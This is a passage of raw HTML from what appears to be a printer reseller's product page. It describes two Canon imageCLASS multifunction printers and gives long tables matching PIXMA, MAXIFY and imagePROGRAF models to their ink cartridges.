src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td 